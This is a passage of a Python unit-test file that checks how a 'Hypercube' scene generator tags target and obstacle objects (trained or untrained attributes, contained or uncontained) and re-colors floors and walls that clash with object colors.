    assert not scene['goal']['sceneInfo']['untrainedCategory'][occluder_tag]
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor'][occluder_tag]
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination'][occluder_tag]
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape'][occluder_tag]
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize'][occluder_tag]
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 2
    assert scene['goal']['sceneInfo']['count'][occluder_tag] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
    assert scene['goal']['sceneInfo']['present'][occluder_tag]
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
def test_Hypercube_tags_target_enclosed():
    """A target with a locationParent is tagged 'contained', not 'uncontained'."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['locationParent'] = 'parent'
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'contained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'contained'
    }
    assert not scene['goal']['sceneInfo']['uncontained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['contained']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_category():
    """untrainedCategory flips 'trained category' to 'untrained category'."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['debug']['untrainedCategory'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'untrained category', 'trained color', 'trained shape', 'trained size',
        'uncontained', 'trained combination'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'untrained category', 'trained color', 'trained shape', 'trained size',
        'uncontained', 'trained combination'
    }
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['trainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_color():
    """untrainedColor flips 'trained color' to 'untrained color'."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['debug']['untrainedColor'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'untrained color', 'trained shape', 'trained size',
        'uncontained', 'trained combination'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'untrained color', 'trained shape', 'trained size',
        'uncontained', 'trained combination'
    }
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['trainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['untrainedColor']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_combination():
    """untrainedCombination flips the 'trained combination' tag."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['debug']['untrainedCombination'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'untrained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'untrained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    assert not scene['goal']['sceneInfo']['trainedCombination']['target']
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedShape']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_shape():
    """untrainedShape flips 'trained shape' to 'untrained shape'."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['debug']['untrainedShape'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')  # debug dump of the template scene
    scene = update_scene_objects(scene, {'target': [target]})
    assert set(scene['goal']['objectsInfo']['all']) == {
        'target',
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'untrained shape',
        'trained size', 'uncontained', 'trained combination'
    }
    assert set(scene['goal']['objectsInfo']['target']) == {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'untrained shape',
        'trained size', 'uncontained', 'trained combination'
    }
    assert not scene['goal']['sceneInfo']['contained']['target']
    assert not scene['goal']['sceneInfo']['trainedShape']['target']
    assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
    assert not scene['goal']['sceneInfo']['untrainedColor']['target']
    assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
    assert not scene['goal']['sceneInfo']['untrainedSize']['target']
    assert scene['goal']['sceneInfo']['present']['target']
    assert scene['goal']['sceneInfo']['trainedCategory']['target']
    assert scene['goal']['sceneInfo']['trainedColor']['target']
    assert scene['goal']['sceneInfo']['trainedCombination']['target']
    assert scene['goal']['sceneInfo']['trainedSize']['target']
    assert scene['goal']['sceneInfo']['uncontained']['target']
    assert scene['goal']['sceneInfo']['untrainedShape']['target']
    assert scene['goal']['sceneInfo']['count']['all'] == 1
    assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_size():
    """A target flagged untrainedSize gets the 'untrained size' tag and
    loses only its 'trained size' tag; all other trained tags remain."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['debug']['untrainedSize'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(scene, {'target': [target]})
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'untrained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == target_tags | {'target'}
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # Scene-info flags expected False for the target.
    for key in (
        'contained', 'trainedSize', 'untrainedCategory',
        'untrainedColor', 'untrainedCombination', 'untrainedShape'
    ):
        assert not info[key]['target']
    # Scene-info flags expected True for the target.
    for key in (
        'present', 'trainedCategory', 'trainedColor',
        'trainedCombination', 'trainedShape', 'uncontained',
        'untrainedSize'
    ):
        assert info[key]['target']
    assert info['count']['all'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_target_enclosed_untrained_everything():
    """An enclosed target flagged untrained in category/color/shape/size is
    tagged 'contained' plus every 'untrained ...' tag except combination."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['locationParent'] = 'parent'
    target['debug']['untrainedCategory'] = True
    target['debug']['untrainedColor'] = True
    target['debug']['untrainedShape'] = True
    target['debug']['untrainedSize'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(scene, {'target': [target]})
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'untrained category', 'untrained color', 'untrained shape',
        'untrained size', 'contained', 'trained combination'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == target_tags | {'target'}
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # Scene-info flags expected False for the target.
    for key in (
        'trainedCategory', 'trainedColor', 'trainedShape',
        'trainedSize', 'untrainedCombination', 'uncontained'
    ):
        assert not info[key]['target']
    # Scene-info flags expected True for the target.
    for key in (
        'contained', 'present', 'trainedCombination',
        'untrainedCategory', 'untrainedColor', 'untrainedShape',
        'untrainedSize'
    ):
        assert info[key]['target']
    assert info['count']['all'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_enclosed():
    """An enclosed obstacle is tagged 'contained' while the target stays
    'uncontained'; both keep all of their trained tags.

    (The original asserted untrainedColor/target twice; the duplicate
    assertion has been removed.)
    """
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['locationParent'] = 'parent'
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'contained'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    # The combined info list is the union of both roles' tags plus the
    # role names themselves.
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # Neither object is untrained in any way; each untrained flag is
    # asserted exactly once per role.
    for key in (
        'untrainedCategory', 'untrainedColor', 'untrainedCombination',
        'untrainedShape', 'untrainedSize'
    ):
        assert not info[key]['obstacle']
        assert not info[key]['target']
    # Only the obstacle is contained; only the target is uncontained.
    assert not info['contained']['target']
    assert not info['uncontained']['obstacle']
    for key in (
        'present', 'trainedCategory', 'trainedColor',
        'trainedCombination', 'trainedShape', 'trainedSize'
    ):
        assert info[key]['obstacle']
        assert info[key]['target']
    assert info['contained']['obstacle']
    assert info['uncontained']['target']
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_category():
    """An obstacle flagged untrainedCategory is tagged 'untrained category';
    the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['debug']['untrainedCategory'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'untrained category', 'trained color', 'trained shape',
        'trained size', 'uncontained', 'trained combination'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'obstacle'), ('contained', 'target'),
        ('trainedCategory', 'obstacle'),
        ('untrainedCategory', 'target'),
        ('untrainedColor', 'obstacle'), ('untrainedColor', 'target'),
        ('untrainedCombination', 'obstacle'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'obstacle'), ('untrainedShape', 'target'),
        ('untrainedSize', 'obstacle'), ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'target'),
        ('trainedColor', 'obstacle'), ('trainedColor', 'target'),
        ('trainedCombination', 'obstacle'), ('trainedCombination', 'target'),
        ('trainedShape', 'obstacle'), ('trainedShape', 'target'),
        ('trainedSize', 'obstacle'), ('trainedSize', 'target'),
        ('uncontained', 'obstacle'), ('uncontained', 'target'),
        ('untrainedCategory', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_color():
    """An obstacle flagged untrainedColor is tagged 'untrained color';
    the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['debug']['untrainedColor'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'untrained color', 'trained shape',
        'trained size', 'uncontained', 'trained combination'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'obstacle'), ('contained', 'target'),
        ('trainedColor', 'obstacle'),
        ('untrainedCategory', 'obstacle'), ('untrainedCategory', 'target'),
        ('untrainedColor', 'target'),
        ('untrainedCombination', 'obstacle'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'obstacle'), ('untrainedShape', 'target'),
        ('untrainedSize', 'obstacle'), ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'obstacle'), ('trainedCategory', 'target'),
        ('trainedColor', 'target'),
        ('trainedCombination', 'obstacle'), ('trainedCombination', 'target'),
        ('trainedShape', 'obstacle'), ('trainedShape', 'target'),
        ('trainedSize', 'obstacle'), ('trainedSize', 'target'),
        ('uncontained', 'obstacle'), ('uncontained', 'target'),
        ('untrainedColor', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_combination():
    """An obstacle flagged untrainedCombination is tagged
    'untrained combination'; the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['debug']['untrainedCombination'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'untrained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'obstacle'), ('contained', 'target'),
        ('trainedCombination', 'obstacle'),
        ('untrainedCategory', 'obstacle'), ('untrainedCategory', 'target'),
        ('untrainedColor', 'obstacle'), ('untrainedColor', 'target'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'obstacle'), ('untrainedShape', 'target'),
        ('untrainedSize', 'obstacle'), ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'obstacle'), ('trainedCategory', 'target'),
        ('trainedColor', 'obstacle'), ('trainedColor', 'target'),
        ('trainedCombination', 'target'),
        ('trainedShape', 'obstacle'), ('trainedShape', 'target'),
        ('trainedSize', 'obstacle'), ('trainedSize', 'target'),
        ('uncontained', 'obstacle'), ('uncontained', 'target'),
        ('untrainedCombination', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_shape():
    """An obstacle flagged untrainedShape is tagged 'untrained shape';
    the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['debug']['untrainedShape'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'untrained shape',
        'trained size', 'uncontained', 'trained combination'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'obstacle'), ('contained', 'target'),
        ('trainedShape', 'obstacle'),
        ('untrainedCategory', 'obstacle'), ('untrainedCategory', 'target'),
        ('untrainedColor', 'obstacle'), ('untrainedColor', 'target'),
        ('untrainedCombination', 'obstacle'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'target'),
        ('untrainedSize', 'obstacle'), ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'obstacle'), ('trainedCategory', 'target'),
        ('trainedColor', 'obstacle'), ('trainedColor', 'target'),
        ('trainedCombination', 'obstacle'), ('trainedCombination', 'target'),
        ('trainedShape', 'target'),
        ('trainedSize', 'obstacle'), ('trainedSize', 'target'),
        ('uncontained', 'obstacle'), ('uncontained', 'target'),
        ('untrainedShape', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_size():
    """An obstacle flagged untrainedSize is tagged 'untrained size';
    the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['debug']['untrainedSize'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'untrained size', 'uncontained'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'obstacle'), ('contained', 'target'),
        ('trainedSize', 'obstacle'),
        ('untrainedCategory', 'obstacle'), ('untrainedCategory', 'target'),
        ('untrainedColor', 'obstacle'), ('untrainedColor', 'target'),
        ('untrainedCombination', 'obstacle'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'obstacle'), ('untrainedShape', 'target'),
        ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'obstacle'), ('trainedCategory', 'target'),
        ('trainedColor', 'obstacle'), ('trainedColor', 'target'),
        ('trainedCombination', 'obstacle'), ('trainedCombination', 'target'),
        ('trainedShape', 'obstacle'), ('trainedShape', 'target'),
        ('trainedSize', 'target'),
        ('uncontained', 'obstacle'), ('uncontained', 'target'),
        ('untrainedSize', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_obstacle_enclosed_untrained_everything():
    """An enclosed obstacle flagged untrained in category/color/shape/size
    is tagged 'contained' plus every 'untrained ...' tag except
    combination; the target keeps all of its trained tags."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    obstacle = create_tags_test_object_2()
    obstacle['locationParent'] = 'parent'
    obstacle['debug']['untrainedCategory'] = True
    obstacle['debug']['untrainedColor'] = True
    obstacle['debug']['untrainedShape'] = True
    obstacle['debug']['untrainedSize'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'untrained category', 'untrained color', 'untrained shape',
        'untrained size', 'contained', 'trained combination'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'trained category', 'trained color', 'trained combination',
        'trained shape', 'trained size', 'uncontained'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # (key, role) pairs whose scene-info flag must be False.
    for key, role in (
        ('contained', 'target'),
        ('trainedCategory', 'obstacle'),
        ('trainedColor', 'obstacle'),
        ('trainedShape', 'obstacle'),
        ('trainedSize', 'obstacle'),
        ('uncontained', 'obstacle'),
        ('untrainedCategory', 'target'),
        ('untrainedColor', 'target'),
        ('untrainedCombination', 'obstacle'),
        ('untrainedCombination', 'target'),
        ('untrainedShape', 'target'),
        ('untrainedSize', 'target')
    ):
        assert not info[key][role]
    # (key, role) pairs whose scene-info flag must be True.
    for key, role in (
        ('contained', 'obstacle'),
        ('present', 'obstacle'), ('present', 'target'),
        ('trainedCategory', 'target'),
        ('trainedColor', 'target'),
        ('trainedCombination', 'obstacle'), ('trainedCombination', 'target'),
        ('trainedShape', 'target'),
        ('trainedSize', 'target'),
        ('uncontained', 'target'),
        ('untrainedCategory', 'obstacle'),
        ('untrainedColor', 'obstacle'),
        ('untrainedShape', 'obstacle'),
        ('untrainedSize', 'obstacle')
    ):
        assert info[key][role]
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def test_Hypercube_tags_target_obstacle_enclosed_untrained_everything():
    """With both objects enclosed and flagged untrained in
    category/color/shape/size, both roles get 'contained' and every
    'untrained ...' tag except combination."""
    hypercube = MockHypercube()
    target = create_tags_test_object_1()
    target['locationParent'] = 'parent'
    target['debug']['untrainedCategory'] = True
    target['debug']['untrainedColor'] = True
    target['debug']['untrainedShape'] = True
    target['debug']['untrainedSize'] = True
    obstacle = create_tags_test_object_2()
    obstacle['locationParent'] = 'parent'
    obstacle['debug']['untrainedCategory'] = True
    obstacle['debug']['untrainedColor'] = True
    obstacle['debug']['untrainedShape'] = True
    obstacle['debug']['untrainedSize'] = True
    scene = hypercube.get_scenes()[0]
    print(f'{scene}')
    scene = update_scene_objects(
        scene,
        {'target': [target], 'obstacle': [obstacle]}
    )
    obstacle_tags = {
        'medium', 'light', 'yellow', 'plastic', 'cube',
        'untrained category', 'untrained color', 'untrained shape',
        'untrained size', 'contained', 'trained combination'
    }
    target_tags = {
        'tiny', 'light', 'blue', 'plastic', 'ball',
        'untrained category', 'untrained color', 'untrained shape',
        'untrained size', 'contained', 'trained combination'
    }
    goal = scene['goal']
    assert set(goal['objectsInfo']['all']) == (
        obstacle_tags | target_tags | {'target', 'obstacle'}
    )
    assert set(goal['objectsInfo']['obstacle']) == obstacle_tags
    assert set(goal['objectsInfo']['target']) == target_tags
    info = goal['sceneInfo']
    # Flags expected False for both roles.
    for key in (
        'trainedCategory', 'trainedColor', 'trainedShape',
        'trainedSize', 'uncontained', 'untrainedCombination'
    ):
        assert not info[key]['obstacle']
        assert not info[key]['target']
    # Flags expected True for both roles.
    for key in (
        'contained', 'present', 'trainedCombination',
        'untrainedCategory', 'untrainedColor', 'untrainedShape',
        'untrainedSize'
    ):
        assert info[key]['obstacle']
        assert info[key]['target']
    assert info['count']['all'] == 2
    assert info['count']['obstacle'] == 1
    assert info['count']['target'] == 1
def retrieve_object_list_from_data(object_data):
    """Wrap a single object-data item in a one-element list (test helper
    passed to update_floor_and_walls as the retrieval callback)."""
    wrapped = [object_data]
    return wrapped
def test_update_floor_and_walls():
    """update_floor_and_walls must re-roll any floor/wall color matching a
    scene object's color, and keep colors that conflict with nothing.

    The original built the same body template inline four times (and had a
    'one objects' comment typo); the setup is factored into local helpers.
    """
    colors = [
        'black', 'blue', 'brown', 'green', 'grey', 'orange', 'purple',
        'red', 'white', 'yellow'
    ]
    template = {
        'floorMaterial': [],
        'wallMaterial': [],
        'debug': {
            'floorColors': [],
            'wallColors': []
        }
    }

    def make_body_template(floor_color, wall_color):
        # Fresh deep copy of the base template with the given colors.
        body_template = copy.deepcopy(template)
        body_template['debug']['floorColors'] = [floor_color]
        body_template['floorMaterial'] = [floor_color]
        body_template['debug']['wallColors'] = [wall_color]
        body_template['wallMaterial'] = [wall_color]
        return body_template

    def run_update(body_template, role_to_object_data_list):
        # Run update_floor_and_walls over two scene copies; return them.
        scenes = [copy.deepcopy(body_template), copy.deepcopy(body_template)]
        update_floor_and_walls(
            body_template,
            role_to_object_data_list,
            retrieve_object_list_from_data,
            scenes
        )
        return scenes

    for color_1 in colors:
        print(f'COLOR_1 {color_1}')
        # Test with no objects: nothing conflicts, so colors are kept.
        scenes = run_update(make_body_template(color_1, color_1), {})
        for scene in scenes:
            assert scene['debug']['floorColors'] == [color_1]
            assert scene['floorMaterial'] == [color_1]
            assert scene['debug']['wallColors'] == [color_1]
            assert scene['wallMaterial'] == [color_1]
        # Test with one object matching both floor and wall colors:
        # both must be re-rolled to something else.
        scenes = run_update(
            make_body_template(color_1, color_1),
            {'target': [{'debug': {'color': [color_1]}}]}
        )
        for scene in scenes:
            assert scene['debug']['floorColors'] != [color_1]
